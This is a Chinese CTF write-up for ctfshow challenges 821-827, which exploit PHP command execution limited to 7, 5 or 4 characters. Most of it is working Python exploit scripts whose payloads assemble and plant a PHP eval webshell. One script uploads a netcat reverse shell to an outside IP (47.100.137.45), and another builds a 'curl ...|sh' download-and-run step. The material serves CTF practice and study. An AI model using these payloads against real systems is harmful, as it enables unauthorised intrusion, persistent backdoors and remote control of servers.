对应 ctfshow 上的 821-827 题

7字符web目录可写

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

#flag in database;
# Challenge source as given: the POST field `cmd` is passed to shell_exec()
# unchanged; the only control on it is the length cap below.
error_reporting(0);          # no PHP warnings/errors reach the page, so a failing command gives no feedback
highlight_file(__FILE__);    # echoes this file's own source into the response

$cmd = $_POST['cmd'];
if(strlen($cmd) <= 7){       # strlen() counts bytes, so this is a 7-byte cap
    shell_exec($cmd);        # the return value (command output) is discarded; only on-disk side effects persist
}
?>

>可以创建文件

\ 表示这一行没有结束，下一行的内容会接在它后面

*可以执行命令,第一个文件为命令,后面的文件为参数

. 可以将文件当脚本执行

正常情况下,我们写一个1.php,内容为helloworld

echo 'helloworld'>1.php

那么怎么在七个字符内写一个内容为helloworld的1.php呢

# The sequence for the helloworld example above, one request body per line
# (each within the 7-byte limit); the last two lines list the written files
# and run the result as a script, as explained above.
>hp
>1.p\\
>\>\\
>rld\\
>low\\
>hel\\
>o\ \\
>ech\\
ls -t>0
. 0

image-20220708181140471

所以我们只需将内容替换为一句话,依次写入即可

# <?php eval($_GET[1]);
# the base64 string below is the encoded form of the one-liner in the comment above
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

821

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL; it ends with "/" so that "1.php" can be appended by check().
url = "http://ed9441a5-6e27-43b0-8538-bdd2f5a5b4d2.challenge.ctf.show/"

# One request body per entry, sent in list order by run(). Every entry stays
# within the 7-byte cap the challenge source places on `cmd`.
payload = [
    ">hp",
    ">1.p\\",
    ">d\\>\\",
    ">\\ -\\",
    ">e64\\",
    ">bas\\",
    ">7\\|\\",
    ">XSk\\",
    ">Fsx\\",
    ">dFV\\",
    ">kX0\\",
    ">bCg\\",
    ">XZh\\",
    ">AgZ\\",
    ">waH\\",
    ">PD9\\",
    ">o\\ \\",
    ">ech\\",
    "ls -t>0",
    ". 0",
]

def writeFile(payload):
    """POST ``payload`` as the ``cmd`` form field to ``url``.

    The HTTP response is not inspected: the challenge discards command
    output, so the only observable effect is what the command leaves on disk.
    """
    form = {"cmd": payload}
    requests.post(url, data=form)

def run():
    """Send each ``payload`` entry (whitespace-stripped) in order, 1 s apart."""
    for raw in payload:
        cmd = raw.strip()
        writeFile(cmd)
        print(f"[*] create {cmd}")
        time.sleep(1)

def check():
    """Print the success line only if ``<url>1.php`` answers with HTTP 200."""
    target = url + "1.php"
    status = requests.get(target).status_code
    if status == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + target)

def main():
    """Send the request sequence, then probe whether 1.php now exists."""
    run()
    check()

    


# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

单独拎出来看一下效果

import os

# The same write sequence as in the script above, without the final
# `ls -t>0` / `. 0` lines, so the created files can be inspected locally.
payload = [
    ">hp",
    ">1.p\\",
    ">d\\>\\",
    ">\\ -\\",
    ">e64\\",
    ">bas\\",
    ">7\\|\\",
    ">XSk\\",
    ">Fsx\\",
    ">dFV\\",
    ">kX0\\",
    ">bCg\\",
    ">XZh\\",
    ">AgZ\\",
    ">waH\\",
    ">PD9\\",
    ">o\\ \\",
    ">ech\\",
]


# Run each entry through the local shell, pausing one second between entries
# (the pause is issued as a shell command rather than via time.sleep).
for cmd in payload:
    os.system(cmd)
    os.system('sleep 1')

image-20220708191342562


7字符web目录不可写

这里用另一种更简单的方法

因为没有web目录的写入权限,可以考虑写临时文件

PHP默认会向临时目录写文件,我们可以上传一个文件,这时PHP会在临时目录下生成这个文件,然后我们直接执行这个文件就行

822

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL (trailing "/" kept so that paths can be appended).
url = "http://538ae548-ca26-4dfc-af73-ded632f3b6be.challenge.ctf.show/"


def getShell(payload):
    """POST ``payload`` as ``cmd`` together with a multipart ``file`` upload.

    The upload is the file PHP stores in its temporary directory (see the
    writeup text); the ``cmd`` value is what is expected to execute it. The
    response is not inspected, and the success line is printed
    unconditionally, so it does not reflect whether anything worked.
    """
    form = {"cmd": payload}
    upload = {"file": b"#!/bin/sh\nnc 47.100.137.45 2233 -e /bin/sh"}
    requests.post(url, data=form, files=upload)
    print("[*] Attack success!!!")

def run():
    """Send the single request this challenge needs (a 7-byte ``cmd``)."""
    getShell(". /t*/*")

def main():
    """Entry point: delegate to run()."""
    run()
    
# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

5字符有dir命令

先将index.php重命名成.php

然后在临时目录写马

最后将临时目录下的文件打包到web目录执行

823

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

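# Challenge instance base URL; paths such as "1.php" are appended to it.
url = "http://a07f1836-53b8-4c20-93a0-430ce8c80b0d.challenge.ctf.show/"
# After the rename step described in the writeup the page is reached as "<url>.php".
url_2 = url+".php"
# Seconds to pause between consecutive requests.
delay = 1

# Phase 1, sent to `url` by changeFile(). The misspelled name is kept because
# the rest of the script refers to it.
chagneFile_payload=[
    '>cp',
    '>k',
    '*',
    'rm cp',
    '>pc',
    '>dir',
    '*>v',
    '>rev',
    '*v>z',  # i.e. `rev v>z` (the original used `//` here, which is not a Python comment and broke parsing)
    'sh z',
    'rm v',
    'rm k',
    'rm z',
    'rm pc',
    'rm *v',
    '>php.',
    '>j\\#',
    '>vm',
    '*>v',
    '>rev',
    '*v>z',
    'sh z'
]

# Phase 2, sent to `url_2` by clearFile().
clearFile_payload=[
    'rm d*',
    'rm j*',
    'rm p*',
    'rm r*',
    'rm v*',
    'rm z'
]

# Phase 3, sent to `url_2` by getshell() before the upload request.
shell_payload=[
    '>tar',
    '>vcf',
    '>z'
]

# Multipart upload body used by getshell(); note the escaped `\$` so the
# Python bytes literal carries a literal `$` into the PHP text.
file={
    'file':b'<?php file_put_contents("1.php","<?php eval(\\$_POST[1]);?>");?>'
}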


def changeFile():
    """Send ``chagneFile_payload`` to ``url`` one entry at a time, ``delay`` s apart.

    Entries are sent unmodified; only the log line is whitespace-stripped.
    """
    for entry in chagneFile_payload:
        sendPayload(url, entry)
        print(f"[*] create {entry.strip()}")
        time.sleep(delay)

def clearFile():
    """Send ``clearFile_payload`` to ``url_2`` one entry at a time, ``delay`` s apart.

    The log line says "create" for every entry even though these are removals.
    """
    for entry in clearFile_payload:
        sendPayload(url_2, entry)
        print(f"[*] create {entry.strip()}")
        time.sleep(delay)

def getshell():
    """Send ``shell_payload`` to ``url_2``, then two final requests.

    The first final request carries the module-level ``file`` upload next to
    ``cmd``; the second carries only ``cmd``. No response is inspected.
    """
    for entry in shell_payload:
        sendPayload(url_2, entry)
        print(f"[*] create {entry.strip()}")
        time.sleep(delay)
    requests.post(url_2, data={"cmd": "* /t*"}, files=file)
    requests.post(url_2, data={"cmd": "php z"})

def checkShell():
    """Print the success line only if ``<url>1.php`` answers with HTTP 200."""
    target = url + "1.php"
    if requests.get(target).status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + target)

def sendPayload(url,payload):
    """POST ``payload`` as the ``cmd`` field to ``url`` (the parameter, which shadows the module-level URL).

    The response is not inspected.
    """
    requests.post(url, data={"cmd": payload})



def run():
    """Run the three request phases in order, then probe for 1.php."""
    changeFile()
    clearFile()
    getshell()
    checkShell()

def main():
    """Entry point: delegate to run()."""
    run()

# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

5字符没有dir命令

利用grep命令

grep h index.php

将匹配出的行写入到文件中,再想办法把内容追加到index.php中

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

#flag in database;
# Challenge source for the 5-character variants: identical to the 7-character
# one except for the tighter length cap below.
error_reporting(0);          # no PHP warnings/errors reach the page
highlight_file(__FILE__);    # echoes this file's own source into the response

$cmd = $_POST['cmd'];
if(strlen($cmd) <= 5){       # strlen() counts bytes, so this is a 5-byte cap
    shell_exec($cmd);        # command output is discarded; only on-disk side effects persist
}
?>

824

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:28
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL (trailing "/" kept so paths can be appended).
url = "http://ce2e69a5-b06c-4fee-ac56-054bd988dad5.challenge.ctf.show/"

# One request body per entry, sent in order by run(); each is within the
# 5-byte cap of this challenge.
payload = [
    ">grep",
    ">h",
    "*>j",
    "rm g*",
    "rm h*",
    ">cat",
    "*>>i",
    "rm c*",
    "rm j",
    ">cp",
    "*",
]

def writeFile(payload):
    """POST ``payload`` as the ``cmd`` form field to ``url``; the response is not inspected."""
    form = {"cmd": payload}
    requests.post(url, data=form)

def run():
    """Send each ``payload`` entry (stripped) 0.5 s apart, then print the final line.

    The final message is printed unconditionally; nothing is verified here.
    """
    for raw in payload:
        cmd = raw.strip()
        writeFile(cmd)
        print(f"[*] create {cmd}")
        time.sleep(0.5)
    print("[*] Attack success!!!Webshell is " + url)

def main():
    """Entry point: delegate to run()."""
    run()

# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

4字符有dir命令

依旧是利用ls -t>0

但是只有4个字符

既然没有办法直接执行命令,那就构造出对应的文件名

825

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL; check() appends "a.php" to it.
url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"

# One request body per entry, sent in order by run(); each is within the
# 4-byte cap of this challenge. The resulting files x and j are shown below
# in the writeup.
payload = [
    '>sl',
    '>kt-',
    '>j\\>',
    '>j\\#',
    '>dir',
    '*>v',
    '>rev',
    '*v>x',
    '>php',
    '>a.\\',
    '>\\>\\',
    '>-d\\',
    '>\\ \\',
    '>64\\',
    '>se\\',
    '>ba\\',
    '>\\|\\',
    '>4=\\',
    '>Pz\\',
    '>k7\\',
    '>XS\\',
    '>sx\\',
    '>VF\\',
    '>dF\\',
    '>X0\\',
    '>gk\\',
    '>bC\\',
    '>Zh\\',
    '>ZX\\',
    '>Ag\\',
    '>aH\\',
    '>9w\\',
    '>PD\\',
    '>S}\\',
    '>IF\\',
    '>{\\',
    '>\\$\\',
    '>ho\\',
    '>ec\\',
    'sh x',
    'sh j',
]

def writeFile(payload):
    """POST ``payload`` as the ``cmd`` form field to ``url``; the response is not inspected."""
    form = {"cmd": payload}
    requests.post(url, data=form)

def run():
    """Send each ``payload`` entry (whitespace-stripped) in order, 0.3 s apart."""
    for raw in payload:
        cmd = raw.strip()
        writeFile(cmd)
        print(f"[*] create {cmd}")
        time.sleep(0.3)

def check():
    """Print the success line only if ``<url>a.php`` answers with HTTP 200."""
    target = url + "a.php"
    status = requests.get(target).status_code
    if status == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + target)

def main():
    """Send the request sequence, then probe whether a.php now exists."""
    run()
    check()

# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

最终x中的内容如下

ls    -tk  >j  #j  php.xedni

j的内容

j
ec\
ho\
$\
{\
IF\
S}\
PD\
9w\
aH\
Ag\
ZX\
Zh\
bC\
gk\
X0\
dF\
VF\
sx\
XS\
k7\
Pz\
4=\
|\
ba\
se\
64\
 \
-d\
>\
a.\
php
x
rev
v
dir
j#
j>
kt-
sl
index.php

4字符无dir命令

依旧利用ls -t

826

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL; check() appends "1.php" to it.
url = "http://fb05f8d2-0afc-459d-89d1-766bf1dcf404.challenge.ctf.show/"

# One request body per entry, sent in order by run(); each is within the
# 4-byte cap of this challenge.
payload = [
    # first part
    '>\\ \\',
    '>-t\\',
    '>\\>a',
    '>ls\\',
    'ls>v',
    '>mv',
    '>vt',
    '*v*',
    '>ls',
    'l*>t',
    '>cat',
    '*t>z',

    # second part (author's notes kept as written)
    #curl 2030350346|sh
    #echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php
    '>sh',
    '>\\|\\',
    '>46\\',
    '>03\\',
    '>35\\',
    '>30\\',
    '>20\\',
    '>\\ \\',
    '>rl\\',
    '>cu\\',

    'sh z',
    'sh a',
]
def writeFile(payload):
    """POST ``payload`` as the ``cmd`` form field to ``url``; the response is not inspected."""
    form = {"cmd": payload}
    requests.post(url, data=form)

def run():
    """Send each ``payload`` entry (whitespace-stripped) in order, 1 s apart."""
    for raw in payload:
        cmd = raw.strip()
        writeFile(cmd)
        print(f"[*] create {cmd}")
        time.sleep(1)

def check():
    """Print the success line only if ``<url>1.php`` answers with HTTP 200."""
    target = url + "1.php"
    status = requests.get(target).status_code
    if status == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + target)

def main():
    """Send the request sequence, then probe whether 1.php now exists."""
    run()
    check()

# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

4字符无dir命令不出网

同上

827

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


import requests
import time

# Challenge instance base URL; check() appends "a.php" to it.
url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"

# One request body per entry, sent in order by run(); each is within the
# 4-byte cap of this challenge. The first part matches the previous script;
# the second replaces its network-dependent step with the local write
# sequence also used for 825.
payload = [
    # first part
    '>\\ \\',
    '>-t\\',
    '>\\>a',
    '>ls\\',
    'ls>v',
    '>mv',
    '>vt',
    '*v*',
    '>ls',
    'l*>t',
    '>cat',
    '*t>z',

    # second part
    '>php',
    '>a.\\',
    '>\\>\\',
    '>-d\\',
    '>\\ \\',
    '>64\\',
    '>se\\',
    '>ba\\',
    '>\\|\\',
    '>4=\\',
    '>Pz\\',
    '>k7\\',
    '>XS\\',
    '>sx\\',
    '>VF\\',
    '>dF\\',
    '>X0\\',
    '>gk\\',
    '>bC\\',
    '>Zh\\',
    '>ZX\\',
    '>Ag\\',
    '>aH\\',
    '>9w\\',
    '>PD\\',
    '>S}\\',
    '>IF\\',
    '>{\\',
    '>\\$\\',
    '>ho\\',
    '>ec\\',

    'sh z',
    'sh a',
]

def writeFile(payload):
    """POST ``payload`` as the ``cmd`` form field to ``url``; the response is not inspected."""
    form = {"cmd": payload}
    requests.post(url, data=form)

def run():
    """Send each ``payload`` entry (whitespace-stripped) in order, 1 s apart."""
    for raw in payload:
        cmd = raw.strip()
        writeFile(cmd)
        print(f"[*] create {cmd}")
        time.sleep(1)

def check():
    """Print the success line only if ``<url>a.php`` answers with HTTP 200."""
    target = url + "a.php"
    status = requests.get(target).status_code
    if status == requests.codes.ok:
        print("[*] Attack success!!!Webshell is " + target)

def main():
    """Send the request sequence, then probe whether a.php now exists."""
    run()
    check()

# Call main() only when executed directly, not when the module is imported.
if __name__ == '__main__':
    main()

ctfshow-技术分享第7期_哔哩哔哩_bilibili

CTFSHOW 常用姿势篇(821-830)_yu22x的博客-CSDN博客
